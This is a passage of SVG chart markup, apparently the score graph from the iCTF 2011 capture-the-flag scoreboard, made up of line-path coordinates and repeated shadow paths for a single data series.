351.5 L 474 351.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 292.5 L 474 292.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 233.5 L 474 233.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 173.5 L 474 173.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 114.5 L 474 114.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 55.5 L 474 55.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path></g><g class="highcharts-series-group" zIndex="3"><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.315152 L 69.6171875 235.82508256 L 71.1452205882353 231.74880736 L 72.6732536764706 231.19469536 L 74.20128676470588 231.19469536 L 75.72931985294119 231.19469536 L 77.25735294117648 231.19469536 L 78.78538602941177 231.19469536 L 80.31341911764706 231.19469536 L 81.84145220588236 231.19469536 L 83.36948529411765 231.19469536 L 84.89751838235294 231.19469536 L 86.42555147058825 229.45687936000002 L 87.95358455882354 228.74346015999998 L 89.48161764705883 226.60671904 L 91.00965073529413 225.14897824 L 92.53768382352942 224.13058432 L 94.06571691176471 223.70690176 L 95.59375 223.70690176 L 97.1217830882353 223.70690176 L 98.6498161764706 223.70690176 L 100.17784926470588 223.70690176 L 101.70588235294119 223.70690176 L 103.23391544117648 223.70690176 L 104.76194852941177 223.70690176 L 106.28998161764706 223.70690176 L 107.81801470588236 223.70690176 L 109.34604779411765 223.70690176 L 110.87408088235294 223.70690176 L 112.40211397058825 223.70690176 L 113.93014705882354 223.09276096000002 L 115.45818014705883 222.473896 L 116.98621323529413 221.94209056 L 118.51424632352942 221.94209056 L 120.04227941176471 221.854146592 L 121.5703125 221.854146592 L 123.0983455882353 221.77502934400002 L 124.6263786764706 221.77502934400002 L 126.15441176470588 221.77502934400002 L 127.68244485294119 221.77502934400002 L 129.21047794117646 221.77502934400002 L 130.73851102941177 221.598210784 L 132.26654411764707 221.44181425066625 L 133.79457720588235 221.44181425066625 L 135.32261029411765 221.36100625066626 L 136.85064338235296 221.36100625066626 L 138.37867647058823 221.36100625066626 L 139.90670955882354 221.36100625066626 L 141.43474264705884 221.36100625066626 L 142.96277573529412 221.36100625066626 L 144.49080882352942 221.36100625066626 L 146.01884191176472 221.36100625066626 L 147.546875 221.36100625066626 L 149.0749080882353 221.36100625066626 L 150.6029411764706 221.36100625066626 L 152.13097426470588 218.66954929066628 L 153.6590073529412 217.97563057066628 L 155.18704044117646 217.97563057066628 L 156.71507352941177 214.99860465066627 L 158.24310661764707 209.52447537066627 L 159.77113970588235 209.52447537066627 L 161.29917279411765 209.52447537066627 L 162.82720588235296 209.52447537066627 L 164.35523897058823 209.52447537066627 L 165.88327205882354 209.52447537066627 L 167.41130514705884 209.52447537066627 L 168.93933823529412 209.52447537066627 L 170.46737132352942 206.15682417066625 L 171.99540441176472 206.15682417066625 L 173.5234375 206.15682417066625 L 175.0514705882353 206.15682417066625 L 176.5795036764706 206.15682417066625 L 178.10753676470588 204.93529137066628 L 179.6355698529412 204.93529137066628 L 181.1636029411765 204.93529137066628 L 182.69163602941177 204.93529137066628 L 184.21966911764707 204.93529137066628 L 185.74770220588235 204.93529137066628 L 187.27573529411765 199.23997905066625 L 188.80376838235296 190.51914417066627 L 190.33180147058823 181.13458257066625 L 191.85983455882354 177.58471377066627 L 193.38786764705884 177.58471377066627 L 194.91590073529412 171.20709777066625 L 196.44393382352942 171.20709777066625 L 197.97196691176472 171.20709777066625 L 199.5 171.20709777066625 L 201.0280330882353 171.20709777066625 L 202.5560661764706 171.20709777066625 L 204.08409926470588 171.20709777066625 L 205.6121323529412 171.20709777066625 L 207.1401654411765 171.20709777066625 L 208.66819852941177 171.20709777066625 L 210.19623161764707 171.20709777066625 L 211.72426470588235 170.8553195306663 L 213.25229779411765 170.8553195306663 L 214.78033088235296 170.8553195306663 L 216.30836397058823 170.8553195306663 L 217.83639705882354 170.8553195306663 L 219.36443014705884 170.8553195306663 L 220.89246323529412 170.8553195306663 L 222.42049632352942 170.8553195306663 L 223.94852941176472 170.8553195306663 L 225.4765625 170.8553195306663 L 227.0045955882353 170.8553195306663 L 228.5326286764706 170.8553195306663 L 230.06066176470588 170.8553195306663 L 231.5886948529412 170.8553195306663 L 233.1167279411765 170.8553195306663 L 234.64476102941177 170.8553195306663 L 236.17279411764707 169.9668932906663 L 237.70082720588238 169.9668932906663 L 239.22886029411765 169.9668932906663 L 240.75689338235296 169.9668932906663 L 242.28492647058823 169.9668932906663 L 243.81295955882354 169.9668932906663 L 245.34099264705884 169.9668932906663 L 246.86902573529412 169.9668932906663 L 248.39705882352942 169.9668932906663 L 249.92509191176472 169.9668932906663 L 251.453125 169.9668932906663 L 252.9811580882353 169.9668932906663 L 254.5091911764706 169.9668932906663 L 256.0372242647059 169.9668932906663 L 257.56525735294116 169.9668932906663 L 259.09329044117646 169.9668932906663 L 260.62132352941177 169.9668932906663 L 262.1493566176471 169.9668932906663 L 263.6773897058824 169.9668932906663 L 265.2054227941177 169.93208369066627 L 266.7334558823529 169.93208369066627 L 268.26148897058823 169.93208369066627 L 269.78952205882354 169.93208369066627 L 271.31755514705884 169.93208369066627 L 272.84558823529414 169.93208369066627 L 274.37362132352945 169.93208369066627 L 275.9016544117647 169.93208369066627 L 277.4296875 169.93208369066627 L 278.9577205882353 169.93208369066627 L 280.4857536764706 169.93208369066627 L 282.0137867647059 169.93208369066627 L 283.54181985294116 169.93208369066627 L 285.06985294117646 169.93208369066627 L 286.59788602941177 169.93208369066627 L 288.1259191176471 169.93208369066627 L 289.6539522058824 169.93208369066627 L 291.1819852941177 169.93208369066627 L 292.7100183823529 169.93208369066627 L 294.23805147058823 169.93208369066627 L 295.76608455882354 169.93208369066627 L 297.29411764705884 169.93208369066627 L 298.82215073529414 169.93208369066627 L 300.35018382352945 169.93208369066627 L 301.8782169117647 169.93208369066627 L 303.40625 163.11984497066626 L 304.9342830882353 151.89524081066628 L 306.4623161764706 151.89524081066628 L 307.9903492647059 151.89524081066628 L 309.51838235294116 151.89524081066628 L 311.04641544117646 151.89524081066628 L 312.57444852941177 151.89524081066628 L 314.1024816176471 151.89524081066628 L 315.6305147058824 143.18861393066626 L 317.1585477941177 143.18861393066626 L 318.6865808823529 143.18861393066626 L 320.21461397058823 143.18861393066626 L 321.74264705882354 143.18861393066626 L 323.27068014705884 123.14467793066623 L 324.79871323529414 123.14467793066623 L 326.32674632352945 123.14467793066623 L 327.8547794117647 123.14467793066623 L 329.3828125 123.14467793066623 L 330.9108455882353 123.14467793066623 L 332.4388786764706 123.14467793066623 L 333.9669117647059 123.14467793066623 L 335.4949448529412 123.14467793066623 L 337.02297794117646 119.25736913066623 L 338.55101102941177 117.28132049066622 L 340.0790441176471 112.22174513066622 L 341.6070772058824 82.9090072106662 L 343.1351102941177 82.9090072106662 L 344.6631433823529 82.9090072106662 L 346.19117647058823 82.9090072106662 L 347.71920955882354 82.9090072106662 L 349.24724264705884 82.9090072106662 L 350.77527573529414 82.9090072106662 L 352.30330882352945 82.9090072106662 L 353.8313419117647 82.9090072106662 L 355.359375 82.9090072106662 L 356.8874080882353 77.08884209066622 L 358.4154411764706 77.08884209066622 L 359.9434742647059 77.08884209066622 L 361.4715073529412 77.08884209066622 L 362.99954044117646 77.08884209066622 L 364.52757352941177 77.08884209066622 L 366.0556066176471 77.08884209066622 L 367.5836397058824 77.08884209066622 L 369.1116727941177 77.08884209066622 L 370.6397058823529 77.08884209066622 L 372.16773897058823 63.71002097066622 L 373.69577205882354 63.71002097066622 L 375.22380514705884 63.29585777066623 L 376.75183823529414 63.29585777066623 L 378.27987132352945 63.29585777066623 L 379.8079044117647 63.29585777066623 L 381.3359375 46.582454570666215 L 382.8639705882353 36.586806890666196 L 384.3920036764706 35.76075377066621 L 385.9200367647059 35.252202090666174 L 387.4480698529412 34.45044465066621 L 388.97610294117646 34.45044465066621 L 390.50413602941177 34.45044465066621 L 392.0321691176471 28.75783185066615 L 393.5602022058824 24.76119249066619 L 395.0882352941177 24.76119249066619" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.315152 L 69.6171875 235.82508256 L 71.1452205882353 231.74880736 L 72.6732536764706 231.19469536 L 74.20128676470588 231.19469536 L 75.72931985294119 231.19469536 L 77.25735294117648 231.19469536 L 78.78538602941177 231.19469536 L 80.31341911764706 231.19469536 L 81.84145220588236 231.19469536 L 83.36948529411765 231.19469536 L 84.89751838235294 231.19469536 L 86.42555147058825 229.45687936000002 L 87.95358455882354 228.74346015999998 L 89.48161764705883 226.60671904 L 91.00965073529413 225.14897824 L 92.53768382352942 224.13058432 L 94.06571691176471 223.70690176 L 95.59375 223.70690176 L 97.1217830882353 223.70690176 L 98.6498161764706 223.70690176 L 100.17784926470588 223.70690176 L 101.70588235294119 223.70690176 L 103.23391544117648 223.70690176 L 104.76194852941177 223.70690176 L 106.28998161764706 223.70690176 L 107.81801470588236 223.70690176 L 109.34604779411765 223.70690176 L 110.87408088235294 223.70690176 L 112.40211397058825 223.70690176 L 113.93014705882354 223.09276096000002 L 115.45818014705883 222.473896 L 116.98621323529413 221.94209056 L 118.51424632352942 221.94209056 L 120.04227941176471 221.854146592 L 121.5703125 221.854146592 L 123.0983455882353 221.77502934400002 L 124.6263786764706 221.77502934400002 L 126.15441176470588 221.77502934400002 L 127.68244485294119 221.77502934400002 L 129.21047794117646 221.77502934400002 L 130.73851102941177 221.598210784 L 132.26654411764707 221.44181425066625 L 133.79457720588235 221.44181425066625 L 135.32261029411765 221.36100625066626 L 136.85064338235296 221.36100625066626 L 138.37867647058823 221.36100625066626 L 139.90670955882354 221.36100625066626 L 141.43474264705884 221.36100625066626 L 142.96277573529412 221.36100625066626 L 144.49080882352942 221.36100625066626 L 146.01884191176472 221.36100625066626 L 147.546875 221.36100625066626 L 149.0749080882353 221.36100625066626 L 150.6029411764706 221.36100625066626 L 152.13097426470588 218.66954929066628 L 153.6590073529412 217.97563057066628 L 155.18704044117646 217.97563057066628 L 156.71507352941177 214.99860465066627 L 158.24310661764707 209.52447537066627 L 159.77113970588235 209.52447537066627 L 161.29917279411765 209.52447537066627 L 162.82720588235296 209.52447537066627 L 164.35523897058823 209.52447537066627 L 165.88327205882354 209.52447537066627 L 167.41130514705884 209.52447537066627 L 168.93933823529412 209.52447537066627 L 170.46737132352942 206.15682417066625 L 171.99540441176472 206.15682417066625 L 173.5234375 206.15682417066625 L 175.0514705882353 206.15682417066625 L 176.5795036764706 206.15682417066625 L 178.10753676470588 204.93529137066628 L 179.6355698529412 204.93529137066628 L 181.1636029411765 204.93529137066628 L 182.69163602941177 204.93529137066628 L 184.21966911764707 204.93529137066628 L 185.74770220588235 204.93529137066628 L 187.27573529411765 199.23997905066625 L 188.80376838235296 190.51914417066627 L 190.33180147058823 181.13458257066625 L 191.85983455882354 177.58471377066627 L 193.38786764705884 177.58471377066627 L 194.91590073529412 171.20709777066625 L 196.44393382352942 171.20709777066625 L 197.97196691176472 171.20709777066625 L 199.5 171.20709777066625 L 201.0280330882353 171.20709777066625 L 202.5560661764706 171.20709777066625 L 204.08409926470588 171.20709777066625 L 205.6121323529412 171.20709777066625 L 207.1401654411765 171.20709777066625 L 208.66819852941177 171.20709777066625 L 210.19623161764707 171.20709777066625 L 211.72426470588235 170.8553195306663 L 213.25229779411765 170.8553195306663 L 214.78033088235296 170.8553195306663 L 216.30836397058823 170.8553195306663 L 217.83639705882354 170.8553195306663 L 219.36443014705884 170.8553195306663 L 220.89246323529412 170.8553195306663 L 222.42049632352942 170.8553195306663 L 223.94852941176472 170.8553195306663 L 225.4765625 170.8553195306663 L 227.0045955882353 170.8553195306663 L 228.5326286764706 170.8553195306663 L 230.06066176470588 170.8553195306663 L 231.5886948529412 170.8553195306663 L 233.1167279411765 170.8553195306663 L 234.64476102941177 170.8553195306663 L 236.17279411764707 169.9668932906663 L 237.70082720588238 169.9668932906663 L 239.22886029411765 169.9668932906663 L 240.75689338235296 169.9668932906663 L 242.28492647058823 169.9668932906663 L 243.81295955882354 169.9668932906663 L 245.34099264705884 169.9668932906663 L 246.86902573529412 169.9668932906663 L 248.39705882352942 169.9668932906663 L 249.92509191176472 169.9668932906663 L 251.453125 169.9668932906663 L 252.9811580882353 169.9668932906663 L 254.5091911764706 169.9668932906663 L 256.0372242647059 169.9668932906663 L 257.56525735294116 169.9668932906663 L 259.09329044117646 169.9668932906663 L 260.62132352941177 169.9668932906663 L 262.1493566176471 169.9668932906663 L 263.6773897058824 169.9668932906663 L 265.2054227941177 169.93208369066627 L 266.7334558823529 169.93208369066627 L 268.26148897058823 169.93208369066627 L 269.78952205882354 169.93208369066627 L 271.31755514705884 169.93208369066627 L 272.84558823529414 169.93208369066627 L 274.37362132352945 169.93208369066627 L 275.9016544117647 169.93208369066627 L 277.4296875 169.93208369066627 L 278.9577205882353 169.93208369066627 L 280.4857536764706 169.93208369066627 L 282.0137867647059 169.93208369066627 L 283.54181985294116 169.93208369066627 L 285.06985294117646 169.93208369066627 L 286.59788602941177 169.93208369066627 L 288.1259191176471 169.93208369066627 L 289.6539522058824 169.93208369066627 L 291.1819852941177 169.93208369066627 L 292.7100183823529 169.93208369066627 L 294.23805147058823 169.93208369066627 L 295.76608455882354 169.93208369066627 L 297.29411764705884 169.93208369066627 L 298.82215073529414 169.93208369066627 L 300.35018382352945 169.93208369066627 L 301.8782169117647 169.93208369066627 L 303.40625 163.11984497066626 L 304.9342830882353 151.89524081066628 L 306.4623161764706 151.89524081066628 L 307.9903492647059 151.89524081066628 L 309.51838235294116 151.89524081066628 L 311.04641544117646 151.89524081066628 L 312.57444852941177 151.89524081066628 L 314.1024816176471 151.89524081066628 L 315.6305147058824 143.18861393066626 L 317.1585477941177 143.18861393066626 L 318.6865808823529 143.18861393066626 L 320.21461397058823 143.18861393066626 L 321.74264705882354 143.18861393066626 L 323.27068014705884 123.14467793066623 L 324.79871323529414 123.14467793066623 L 326.32674632352945 123.14467793066623 L 327.8547794117647 123.14467793066623 L 329.3828125 123.14467793066623 L 330.9108455882353 123.14467793066623 L 332.4388786764706 123.14467793066623 L 333.9669117647059 123.14467793066623 L 335.4949448529412 123.14467793066623 L 337.02297794117646 119.25736913066623 L 338.55101102941177 117.28132049066622 L 340.0790441176471 112.22174513066622 L 341.6070772058824 82.9090072106662 L 343.1351102941177 82.9090072106662 L 344.6631433823529 82.9090072106662 L 346.19117647058823 82.9090072106662 L 347.71920955882354 82.9090072106662 L 349.24724264705884 82.9090072106662 L 350.77527573529414 82.9090072106662 L 352.30330882352945 82.9090072106662 L 353.8313419117647 82.9090072106662 L 355.359375 82.9090072106662 L 356.8874080882353 77.08884209066622 L 358.4154411764706 77.08884209066622 L 359.9434742647059 77.08884209066622 L 361.4715073529412 77.08884209066622 L 362.99954044117646 77.08884209066622 L 364.52757352941177 77.08884209066622 L 366.0556066176471 77.08884209066622 L 367.5836397058824 77.08884209066622 L 369.1116727941177 77.08884209066622 L 370.6397058823529 77.08884209066622 L 372.16773897058823 63.71002097066622 L 373.69577205882354 63.71002097066622 L 375.22380514705884 63.29585777066623 L 376.75183823529414 63.29585777066623 L 378.27987132352945 63.29585777066623 L 379.8079044117647 63.29585777066623 L 381.3359375 46.582454570666215 L 382.8639705882353 36.586806890666196 L 384.3920036764706 35.76075377066621 L 385.9200367647059 35.252202090666174 L 387.4480698529412 34.45044465066621 L 388.97610294117646 34.45044465066621 L 390.50413602941177 34.45044465066621 L 392.0321691176471 28.75783185066615 L 393.5602022058824 24.76119249066619 L 395.0882352941177 24.76119249066619" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.315152 L 69.6171875 235.82508256 L 71.1452205882353 231.74880736 L 72.6732536764706 231.19469536 L 74.20128676470588 231.19469536 L 75.72931985294119 231.19469536 L 77.25735294117648 231.19469536 L 78.78538602941177 231.19469536 L 80.31341911764706 231.19469536 L 81.84145220588236 231.19469536 L 83.36948529411765 231.19469536 L 84.89751838235294 231.19469536 L 86.42555147058825 229.45687936000002 L 87.95358455882354 228.74346015999998 L 89.48161764705883 226.60671904 L 91.00965073529413 225.14897824 L 92.53768382352942 224.13058432 L 94.06571691176471 223.70690176 L 95.59375 223.70690176 L 97.1217830882353 223.70690176 L 98.6498161764706 223.70690176 L 100.17784926470588 223.70690176 L 101.70588235294119 223.70690176 L 103.23391544117648 223.70690176 L 104.76194852941177 223.70690176 L 106.28998161764706 223.70690176 L 107.81801470588236 223.70690176 L 109.34604779411765 223.70690176 L 110.87408088235294 223.70690176 L 112.40211397058825 223.70690176 L 113.93014705882354 223.09276096000002 L 115.45818014705883 222.473896 L 116.98621323529413 221.94209056 L 118.51424632352942 221.94209056 L 120.04227941176471 221.854146592 L 121.5703125 221.854146592 L 123.0983455882353 221.77502934400002 L 124.6263786764706 221.77502934400002 L 126.15441176470588 221.77502934400002 L 127.68244485294119 221.77502934400002 L 129.21047794117646 221.77502934400002 L 130.73851102941177 221.598210784 L 132.26654411764707 221.44181425066625 L 133.79457720588235 221.44181425066625 L 135.32261029411765 221.36100625066626 L 136.85064338235296 221.36100625066626 L 138.37867647058823 221.36100625066626 L 139.90670955882354 221.36100625066626 L 141.43474264705884 221.36100625066626 L 142.96277573529412 221.36100625066626 L 144.49080882352942 221.36100625066626 L 146.01884191176472 221.36100625066626 L 147.546875 221.36100625066626 L 149.0749080882353 221.36100625066626 L 150.6029411764706 221.36100625066626 L 152.13097426470588 218.66954929066628 L 153.6590073529412 217.97563057066628 L 155.18704044117646 217.97563057066628 L 156.71507352941177 214.99860465066627 L 158.24310661764707 209.52447537066627 L 159.77113970588235 209.52447537066627 L 161.29917279411765 209.52447537066627 L 162.82720588235296 209.52447537066627 L 164.35523897058823 209.52447537066627 L 165.88327205882354 209.52447537066627 L 167.41130514705884 209.52447537066627 L 168.93933823529412 209.52447537066627 L 170.46737132352942 206.15682417066625 L 171.99540441176472 206.15682417066625 L 173.5234375 206.15682417066625 L 175.0514705882353 206.15682417066625 L 176.5795036764706 206.15682417066625 L 178.10753676470588 204.93529137066628 L 179.6355698529412 204.93529137066628 L 181.1636029411765 204.93529137066628 L 182.69163602941177 204.93529137066628 L 184.21966911764707 204.93529137066628 L 185.74770220588235 204.93529137066628 L 187.27573529411765 199.23997905066625 L 188.80376838235296 190.51914417066627 L 190.33180147058823 181.13458257066625 L 191.85983455882354 177.58471377066627 L 193.38786764705884 177.58471377066627 L 194.91590073529412 171.20709777066625 L 196.44393382352942 171.20709777066625 L 197.97196691176472 171.20709777066625 L 199.5 171.20709777066625 L 201.0280330882353 171.20709777066625 L 202.5560661764706 171.20709777066625 L 204.08409926470588 171.20709777066625 L 205.6121323529412 171.20709777066625 L 207.1401654411765 171.20709777066625 L 208.66819852941177 171.20709777066625 L 210.19623161764707 171.20709777066625 L 211.72426470588235 170.8553195306663 L 213.25229779411765 170.8553195306663 L 214.78033088235296 170.8553195306663 L 216.30836397058823 170.8553195306663 L 217.83639705882354 170.8553195306663 L 219.36443014705884 170.8553195306663 L 220.89246323529412 170.8553195306663 L 222.42049632352942 170.8553195306663 L 223.94852941176472 170.8553195306663 L 225.4765625 170.8553195306663 L 227.0045955882353 170.8553195306663 L 228.5326286764706 170.8553195306663 L 230.06066176470588 170.8553195306663 L 231.5886948529412 170.8553195306663 L 233.1167279411765 170.8553195306663 L 234.64476102941177 170.8553195306663 L 236.17279411764707 169.9668932906663 L 237.70082720588238 169.9668932906663 L 239.22886029411765 169.9668932906663 L 240.75689338235296 169.9668932906663 L 242.28492647058823 169.9668932906663 L 243.81295955882354 169.9668932906663 L 245.34099264705884 169.9668932906663 L 246.86902573529412 169.9668932906663 L 248.39705882352942 169.9668932906663 L 249.92509191176472 169.9668932906663 L 251.453125 169.9668932906663 L 252.9811580882353 169.9668932906663 L 254.5091911764706 169.9668932906663 L 256.0372242647059 169.9668932906663 L 257.56525735294116 169.9668932906663 L 259.09329044117646 169.9668932906663 L 260.62132352941177 169.9668932906663 L 262.1493566176471 169.9668932906663 L 263.6773897058824 169.9668932906663 L 265.2054227941177 169.93208369066627 L 266.7334558823529 169.93208369066627 L 268.26148897058823 169.93208369066627 L 269.78952205882354 169.93208369066627 L 271.31755514705884 169.93208369066627 L 272.84558823529414 169.93208369066627 L 274.37362132352945 169.93208369066627 L 275.9016544117647 169.93208369066627 L 277.4296875 169.93208369066627 L 278.9577205882353 169.93208369066627 L 280.4857536764706 169.93208369066627 L 282.0137867647059 169.93208369066627 L 283.54181985294116 169.93208369066627 L 285.06985294117646 169.93208369066627 L 286.59788602941177 169.93208369066627 L 288.1259191176471 169.93208369066627 L 289.6539522058824 169.93208369066627 L 291.1819852941177 169.93208369066627 L 292.7100183823529 169.93208369066627 L 294.23805147058823 169.93208369066627 L 295.76608455882354 169.93208369066627 L 297.29411764705884 169.93208369066627 L 298.82215073529414 169.93208369066627 L 300.35018382352945 169.93208369066627 L 301.8782169117647 169.93208369066627 L 303.40625 163.11984497066626 L 304.9342830882353 151.89524081066628 L 306.4623161764706 151.89524081066628 L 307.9903492647059 151.89524081066628 L 309.51838235294116 151.89524081066628 L 311.04641544117646 151.89524081066628 L 312.57444852941177 151.89524081066628 L 314.1024816176471 151.89524081066628 L 315.6305147058824 143.18861393066626 L 317.1585477941177 143.18861393066626 L 318.6865808823529 143.18861393066626 L 320.21461397058823 143.18861393066626 L 321.74264705882354 143.18861393066626 L 323.27068014705884 123.14467793066623 L 324.79871323529414 123.14467793066623 L 326.32674632352945 123.14467793066623 L 327.8547794117647 123.14467793066623 L 329.3828125 123.14467793066623 L 330.9108455882353 123.14467793066623 L 332.4388786764706 123.14467793066623 L 333.9669117647059 123.14467793066623 L 335.4949448529412 123.14467793066623 L 337.02297794117646 119.25736913066623 L 338.55101102941177 117.28132049066622 L 340.0790441176471 112.22174513066622 L 341.6070772058824 82.9090072106662 L 343.1351102941177 82.9090072106662 L 344.6631433823529 82.9090072106662 L 346.19117647058823 82.9090072106662 L 347.71920955882354 82.9090072106662 L 349.24724264705884 82.9090072106662 L 350.77527573529414 82.9090072106662 L 352.30330882352945 82.9090072106662 L 353.8313419117647 82.9090072106662 L 355.359375 82.9090072106662 L 356.8874080882353 77.08884209066622 L 358.4154411764706 77.08884209066622 L 359.9434742647059 77.08884209066622 L 361.4715073529412 77.08884209066622 L 362.99954044117646 77.08884209066622 L 364.52757352941177 77.08884209066622 L 366.0556066176471 77.08884209066622 L 367.5836397058824 77.08884209066622 L 369.1116727941177 77.08884209066622 L 370.6397058823529 77.08884209066622 L 372.16773897058823 63.71002097066622 L 373.69577205882354 63.71002097066622 L 375.22380514705884 63.29585777066623 L 376.75183823529414 63.29585777066623 L 378.27987132352945 63.29585777066623 L 379.8079044117647 63.29585777066623 L 381.3359375 46.582454570666215 L 382.8639705882353 36.586806890666196 L 384.3920036764706 35.76075377066621 L 385.9200367647059 35.252202090666174 L 387.4480698529412 34.45044465066621 L 388.97610294117646 34.45044465066621 L 390.50413602941177 34.45044465066621 L 392.0321691176471 28.75783185066615 L 393.5602022058824 24.76119249066619 L 395.0882352941177 24.76119249066619" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.315152 L 69.6171875 235.82508256 L 71.1452205882353 231.74880736 L 72.6732536764706 231.19469536 L 74.20128676470588 231.19469536 L 75.72931985294119 231.19469536 L 77.25735294117648 231.19469536 L 78.78538602941177 231.19469536 L 80.31341911764706 231.19469536 L 81.84145220588236 231.19469536 L 83.36948529411765 231.19469536 L 84.89751838235294 231.19469536 L 86.42555147058825 229.45687936000002 L 87.95358455882354 228.74346015999998 L 89.48161764705883 226.60671904 L 91.00965073529413 225.14897824 L 92.53768382352942 224.13058432 L 94.06571691176471 223.70690176 L 95.59375 223.70690176 L 97.1217830882353 223.70690176 L 98.6498161764706 223.70690176 L 100.17784926470588 223.70690176 L 101.70588235294119 223.70690176 L 103.23391544117648 223.70690176 L 104.76194852941177 223.70690176 L 106.28998161764706 223.70690176 L 107.81801470588236 223.70690176 L 109.34604779411765 223.70690176 L 110.87408088235294 223.70690176 L 112.40211397058825 223.70690176 L 113.93014705882354 223.09276096000002 L 115.45818014705883 222.473896 L 116.98621323529413 221.94209056 L 118.51424632352942 221.94209056 L 120.04227941176471 221.854146592 L 121.5703125 221.854146592 L 123.0983455882353 221.77502934400002 L 124.6263786764706 221.77502934400002 L 126.15441176470588 221.77502934400002 L 127.68244485294119 221.77502934400002 L 129.21047794117646 